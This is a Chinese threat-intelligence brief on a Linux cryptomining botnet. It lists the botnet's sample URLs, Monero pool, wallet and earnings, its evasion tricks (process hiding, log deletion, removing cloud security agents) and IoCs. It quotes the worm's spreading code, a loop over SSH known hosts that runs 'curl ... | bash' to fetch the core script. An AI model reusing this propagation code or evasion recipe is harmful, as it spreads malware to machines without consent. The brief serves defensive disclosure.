威胁快讯:一次僵尸挖矿威胁分析
友商发布了一个威胁分析 报告,我们阐述一下从我们的角度看到的情况。
核心样本
hxxp://120.55.54.65/a7
核心样本是个 Linux Shell 文件,后续动作均由该样本完成,包括:
- 挖矿获利
- 确保资源
- 逃避检测
- 横向扩展
挖矿获利
具体的挖矿动作是由下面一组样本完成的:
- hxxps://www.aybc.so/ubuntu.tar.gz
- hxxps://www.aybc.so/debian.tar.gz
- hxxps://www.aybc.so/cent.tar.gz
样本中的挖矿配置如下:
- 矿池地址:xmr-asia1.nanopool.org:14433
- 钱包地址:42im1KxfTw2Sxa716eKkQAcJpS6cwqkGaHHGnnUAcdDhG2NJhqEF1nNRwjkBsYDJQtDkLCTPehfDC4zjMy5hefT81Xk2h7V.v7
查矿池给付记录可知:
- 累计收益:52.403617565491 XMR
- 当前算力:114,030.0 H/s
- 开始时间:2018-02-28 14:30:03
- 最近给付时间:2018-06-26 05:35:36
确保资源
核心模块中为了确保挖矿资源,采取了若干对抗动作,包括:
- 杀进程:杀掉了其他挖矿进程运行,进程关键字包括 xig, cranbery, xmr,stratum,minerd
- 设防火墙规则:为防止竞争者DDG僵尸网络的矿机下载,屏蔽IP地址 165.225.157.157
- 调整hosts:屏蔽了若干矿池,包括 yiluzhuanqian, f2pool, minexmr 等等
逃避检测
核心模块采取了若干动作对抗检测,包括:
- 调整文件时间,逃避 find 检索。使用 /etc/sudoers 文件的时间来对齐自身关键文件时间
- 隐藏进程:调用 libprocesshider ,来自github 上 gianlucaborello 的 libprocesshider项目
- 调整 ld.so.preload:按照友商的说法是隐藏进程
- 调整dns服务器:防止被从dns流量中分析出来,将本地DNS服务器设为 8.8.8.8 和 1.1.1.1
- 对抗阿里云、云镜:调用 aliyun、yunjing的uninstall脚本
- 删除日志和邮件:删除文件包括 /var/log/cron /var/spool/mail/root /var/mail/root
横向扩展
检查本地 ssh 凭证,尝试进一步横向扩展,继续投递核心模块 a7
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- hxxp://120.55.54.65/a7 | bash >/dev/null 2>&1 &' & done
fi
IoC
主要模块
hxxp://120.55.54.65/a7 AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
挖矿程序
hxxps://www.aybc.so/ubuntu.tar.gz
hxxps://www.aybc.so/debian.tar.gz
hxxps://www.aybc.so/cent.tar.gz